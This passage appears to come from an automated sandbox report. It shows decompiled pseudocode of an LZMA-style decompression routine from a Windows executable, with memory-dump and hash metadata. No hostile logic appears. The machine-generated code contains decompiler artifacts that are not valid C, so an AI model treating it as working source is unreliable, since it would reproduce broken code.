              												if( *(__ebp - 0x38) >= 0xa) {
              													_t98 = __ebp - 0x38;
              													 *_t98 =  *(__ebp - 0x38) - 6;
              													__eflags =  *_t98;
              												} else {
              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              												}
              											} else {
              												 *(__ebp - 0x38) = 0;
              											}
              											__eflags =  *(__ebp - 0x34) - __edx;
              											if( *(__ebp - 0x34) == __edx) {
              												__ebx = 0;
              												__ebx = 1;
              												goto L61;
              											} else {
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__ecx =  *(__ebp - 8);
              												__ebx = 0;
              												__ebx = 1;
              												__al =  *((intOrPtr*)(__eax + __ecx));
              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              												goto L41;
              											}
              										case 7:
              											__eflags =  *(__ebp - 0x40) - 1;
              											if( *(__ebp - 0x40) != 1) {
              												__eax =  *(__ebp - 0x24);
              												 *(__ebp - 0x80) = 0x16;
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												__eax =  *(__ebp - 0x2c);
              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xa;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              												__eax =  *(__ebp - 4);
              												__eax =  *(__ebp - 4) + 0x664;
              												__eflags = __eax;
              												 *(__ebp - 0x58) = __eax;
              												goto L69;
              											}
              											__eax =  *(__ebp - 4);
              											__ecx =  *(__ebp - 0x38);
              											 *(__ebp - 0x84) = 8;
              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              											goto L132;
              										case 8:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xa;
              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              											} else {
              												__eax =  *(__ebp - 0x38);
              												__ecx =  *(__ebp - 4);
              												__eax =  *(__ebp - 0x38) + 0xf;
              												 *(__ebp - 0x84) = 9;
              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              											}
              											goto L132;
              										case 9:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												goto L90;
              											}
              											__eflags =  *(__ebp - 0x60);
              											if( *(__ebp - 0x60) == 0) {
              												goto L171;
              											}
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
              											__eflags = _t259;
              											0 | _t259 = _t259 + _t259 + 9;
              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
              											goto L76;
              										case 0xa:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xb;
              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              												goto L132;
              											}
              											__eax =  *(__ebp - 0x28);
              											goto L89;
              										case 0xb:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__ecx =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x20);
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              											} else {
              												__eax =  *(__ebp - 0x24);
              											}
              											__ecx =  *(__ebp - 0x28);
              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
              											L89:
              											__ecx =  *(__ebp - 0x2c);
              											 *(__ebp - 0x2c) = __eax;
              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              											L90:
              											__eax =  *(__ebp - 4);
              											 *(__ebp - 0x80) = 0x15;
              											__eax =  *(__ebp - 4) + 0xa68;
              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              											goto L69;
              										case 0xc:
              											L100:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xc;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t335 = __ebp - 0x70;
              											 *_t335 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t335;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											__eax =  *(__ebp - 0x2c);
              											goto L102;
              										case 0xd:
              											L37:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xd;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t122 = __ebp - 0x70;
              											 *_t122 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t122;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L39:
              											__eax =  *(__ebp - 0x40);
              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              												goto L48;
              											}
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												goto L54;
              											}
              											L41:
              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              											__ecx =  *(__ebp - 0x58);
              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              											 *(__ebp - 0x48) = __eax;
              											__eax = __eax + 1;
              											__eax = __eax << 8;
              											__eax = __eax + __ebx;
              											__esi =  *(__ebp - 0x58) + __eax * 2;
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edx = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												 *(__ebp - 0x40) = 1;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												__ebx = __ebx + __ebx + 1;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edx;
              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L39;
              											} else {
              												goto L37;
              											}
              										case 0xe:
              											L46:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xe;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t156 = __ebp - 0x70;
              											 *_t156 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t156;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											while(1) {
              												L48:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													break;
              												}
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t170 = __edx + 1; // 0x1
              													__ebx = _t170;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													continue;
              												} else {
              													goto L46;
              												}
              											}
              											L54:
              											_t173 = __ebp - 0x34;
              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              											__eflags =  *_t173;
              											goto L55;
              										case 0xf:
              											L58:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xf;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t203 = __ebp - 0x70;
              											 *_t203 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t203;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L60:
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												L55:
              												__al =  *(__ebp - 0x44);
              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              												goto L56;
              											}
              											L61:
              											__eax =  *(__ebp - 0x58);
              											__edx = __ebx + __ebx;
              											__ecx =  *(__ebp - 0x10);
              											__esi = __edx + __eax;
              											__ecx =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edi = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												_t217 = __edx + 1; // 0x1
              												__ebx = _t217;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edi;
              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L60;
              											} else {
              												goto L58;
              											}
              										case 0x10:
              											L110:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0x10;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t366 = __ebp - 0x70;
              											 *_t366 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t366;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											goto L112;
              										case 0x11:
              											L69:
              											__esi =  *(__ebp - 0x58);
              											 *(__ebp - 0x84) = 0x12;
              											L132:
              											 *(_t612 - 0x54) = _t605;
              											goto L133;
              										case 0x12:
              											goto L0;
              										case 0x13:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												_t469 = __ebp - 0x58;
              												 *_t469 =  *(__ebp - 0x58) + 0x204;
              												__eflags =  *_t469;
              												 *(__ebp - 0x30) = 0x10;
              												 *(__ebp - 0x40) = 8;
              												goto L144;
              											}
              											__eax =  *(__ebp - 0x4c);
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											 *(__ebp - 0x30) = 8;
              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              											goto L130;
              										case 0x14:
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              											__eax =  *(__ebp - 0x80);
              											L140:
              											 *(_t612 - 0x88) = _t533;
              											goto L1;
              										case 0x15:
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              											__al = __al & 0x000000fd;
              											__eax = (__eflags >= 0) - 1 + 0xb;
              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              											goto L121;
              										case 0x16:
              											__eax =  *(__ebp - 0x30);
              											__eflags = __eax - 4;
              											if(__eax >= 4) {
              												_push(3);
              												_pop(__eax);
              											}
              											__ecx =  *(__ebp - 4);
              											 *(__ebp - 0x40) = 6;
              											__eax = __eax << 7;
              											 *(__ebp - 0x7c) = 0x19;
              											 *(__ebp - 0x58) = __eax;
              											goto L145;
              										case 0x17:
              											goto L145;
              										case 0x18:
              											L146:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0x18;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t484 = __ebp - 0x70;
              											 *_t484 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t484;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L148:
              											_t487 = __ebp - 0x48;
              											 *_t487 =  *(__ebp - 0x48) - 1;
              											__eflags =  *_t487;
              											goto L149;
              										case 0x19:
              											__eflags = __ebx - 4;
              											if(__ebx < 4) {
              												 *(__ebp - 0x2c) = __ebx;
              												L120:
              												_t394 = __ebp - 0x2c;
              												 *_t394 =  *(__ebp - 0x2c) + 1;
              												__eflags =  *_t394;
              												L121:
              												__eax =  *(__ebp - 0x2c);
              												__eflags = __eax;
              												if(__eax == 0) {
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              													goto L170;
              												}
              												__eflags = __eax -  *(__ebp - 0x60);
              												if(__eax >  *(__ebp - 0x60)) {
              													goto L171;
              												}
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              												__eax =  *(__ebp - 0x30);
              												_t401 = __ebp - 0x60;
              												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              												__eflags =  *_t401;
              												goto L124;
              											}
              											__ecx = __ebx;
              											__eax = __ebx;
              											__ecx = __ebx >> 1;
              											__eax = __ebx & 0x00000001;
              											__ecx = (__ebx >> 1) - 1;
              											__al = __al | 0x00000002;
              											__eax = (__ebx & 0x00000001) << __cl;
              											__eflags = __ebx - 0xe;
              											 *(__ebp - 0x2c) = __eax;
              											if(__ebx >= 0xe) {
              												__ebx = 0;
              												 *(__ebp - 0x48) = __ecx;
              												L103:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													__eax = __eax + __ebx;
              													 *(__ebp - 0x40) = 4;
              													 *(__ebp - 0x2c) = __eax;
              													__eax =  *(__ebp - 4);
              													__eax =  *(__ebp - 4) + 0x644;
              													__eflags = __eax;
              													L109:
              													__ebx = 0;
              													 *(__ebp - 0x58) = __eax;
              													 *(__ebp - 0x50) = 1;
              													 *(__ebp - 0x44) = 0;
              													 *(__ebp - 0x48) = 0;
              													L113:
              													__eax =  *(__ebp - 0x40);
              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              														_t392 = __ebp - 0x2c;
              														 *_t392 =  *(__ebp - 0x2c) + __ebx;
              														__eflags =  *_t392;
              														goto L120;
              													}
              													__eax =  *(__ebp - 0x50);
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              													__eax =  *(__ebp - 0x58);
              													__esi = __edi + __eax;
              													 *(__ebp - 0x54) = __esi;
              													__ax =  *__esi;
              													__ecx = __ax & 0x0000ffff;
              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              													__eflags =  *(__ebp - 0xc) - __edx;
              													if( *(__ebp - 0xc) >= __edx) {
              														__ecx = 0;
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              														__ecx = 1;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              														__ebx = 1;
              														__ecx =  *(__ebp - 0x48);
              														__ebx = 1 << __cl;
              														__ecx = 1 << __cl;
              														__ebx =  *(__ebp - 0x44);
              														__ebx =  *(__ebp - 0x44) | __ecx;
              														__cx = __ax;
              														__cx = __ax >> 5;
              														__eax = __eax - __ecx;
              														__edi = __edi + 1;
              														__eflags = __edi;
              														 *(__ebp - 0x44) = __ebx;
              														 *__esi = __ax;
              														 *(__ebp - 0x50) = __edi;
              													} else {
              														 *(__ebp - 0x10) = __edx;
              														0x800 = 0x800 - __ecx;
              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              														 *__esi = __dx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L112:
              														_t369 = __ebp - 0x48;
              														 *_t369 =  *(__ebp - 0x48) + 1;
              														__eflags =  *_t369;
              														goto L113;
              													} else {
              														goto L110;
              													}
              												}
              												__ecx =  *(__ebp - 0xc);
              												__ebx = __ebx + __ebx;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              													__ecx =  *(__ebp - 0x10);
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													__ebx = __ebx | 0x00000001;
              													__eflags = __ebx;
              													 *(__ebp - 0x44) = __ebx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													L102:
              													_t339 = __ebp - 0x48;
              													 *_t339 =  *(__ebp - 0x48) - 1;
              													__eflags =  *_t339;
              													goto L103;
              												} else {
              													goto L100;
              												}
              											}
              											__edx =  *(__ebp - 4);
              											__eax = __eax - __ebx;
              											 *(__ebp - 0x40) = __ecx;
              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              											goto L109;
              										case 0x1a:
              											L56:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												 *(__ebp - 0x88) = 0x1a;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x68);
              											__al =  *(__ebp - 0x5c);
              											__edx =  *(__ebp - 8);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              											 *( *(__ebp - 0x68)) = __al;
              											__ecx =  *(__ebp - 0x14);
              											 *(__ecx +  *(__ebp - 8)) = __al;
              											__eax = __ecx + 1;
              											__edx = 0;
              											_t192 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t192;
              											goto L80;
              										case 0x1b:
              											L76:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												 *(__ebp - 0x88) = 0x1b;
              												goto L170;
              											}
              											__eax =  *(__ebp - 0x14);
              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              											__eflags = __eax -  *(__ebp - 0x74);
              											if(__eax >=  *(__ebp - 0x74)) {
              												__eax = __eax +  *(__ebp - 0x74);
              												__eflags = __eax;
              											}
              											__edx =  *(__ebp - 8);
              											__cl =  *(__eax + __edx);
              											__eax =  *(__ebp - 0x14);
              											 *(__ebp - 0x5c) = __cl;
              											 *(__eax + __edx) = __cl;
              											__eax = __eax + 1;
              											__edx = 0;
              											_t275 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t275;
              											__eax =  *(__ebp - 0x68);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											_t284 = __ebp - 0x64;
              											 *_t284 =  *(__ebp - 0x64) - 1;
              											__eflags =  *_t284;
              											 *( *(__ebp - 0x68)) = __cl;
              											L80:
              											 *(__ebp - 0x14) = __edx;
              											goto L81;
              										case 0x1c:
              											while(1) {
              												L124:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													break;
              												}
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t415 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t415;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              												__eflags =  *(__ebp - 0x30);
              												 *( *(__ebp - 0x68)) = __cl;
              												 *(__ebp - 0x14) = _t415;
              												if( *(__ebp - 0x30) > 0) {
              													continue;
              												} else {
              													L81:
              													 *(__ebp - 0x88) = 2;
              													goto L1;
              												}
              											}
              											 *(__ebp - 0x88) = 0x1c;
              											L170:
              											_push(0x22);
              											_pop(_t567);
              											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
              											_t535 = 0;
              											L172:
              											return _t535;
              									}
              								}
              								L171:
              								_t535 = _t534 | 0xffffffff;
              								goto L172;
              							}
              						}
              						__eax =  *(__ebp - 0x50);
              						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              						__eax =  *(__ebp - 0x58);
              						__esi = __edx + __eax;
              						 *(__ebp - 0x54) = __esi;
              						__ax =  *__esi;
              						__edi = __ax & 0x0000ffff;
              						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              						if( *(__ebp - 0xc) >= __ecx) {
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              							__cx = __ax;
              							__cx = __ax >> 5;
              							__eax = __eax - __ecx;
              							__edx = __edx + 1;
              							 *__esi = __ax;
              							 *(__ebp - 0x50) = __edx;
              						} else {
              							 *(__ebp - 0x10) = __ecx;
              							0x800 = 0x800 - __edi;
              							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              							 *__esi = __cx;
              						}
              						if( *(__ebp - 0x10) >= 0x1000000) {
              							goto L148;
              						} else {
              							goto L146;
              						}
              					}
              					goto L1;
              				}
              			}









              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
              • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
              • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
              • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406FA7() {
              				unsigned short _t532;
              				signed int _t533;
              				void _t534;
              				void* _t535;
              				signed int _t536;
              				signed int _t565;
              				signed int _t568;
              				signed int _t589;
              				signed int* _t606;
              				void* _t613;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t613 - 0x40) != 0) {
              						L89:
              						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
              						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
              						L69:
              						_t606 =  *(_t613 - 0x58);
              						 *(_t613 - 0x84) = 0x12;
              						L132:
              						 *(_t613 - 0x54) = _t606;
              						L133:
              						_t532 =  *_t606;
              						_t589 = _t532 & 0x0000ffff;
              						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              						if( *(_t613 - 0xc) >= _t565) {
              							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
              							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              							 *(_t613 - 0x40) = 1;
              							_t533 = _t532 - (_t532 >> 5);
              							 *_t606 = _t533;
              						} else {
              							 *(_t613 - 0x10) = _t565;
              							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              							 *_t606 = (0x800 - _t589 >> 5) + _t532;
              						}
              						if( *(_t613 - 0x10) >= 0x1000000) {
              							L139:
              							_t534 =  *(_t613 - 0x84);
              							L140:
              							 *(_t613 - 0x88) = _t534;
              							goto L1;
              						} else {
              							L137:
              							if( *(_t613 - 0x6c) == 0) {
              								 *(_t613 - 0x88) = 5;
              								goto L170;
              							}
              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              							goto L139;
              						}
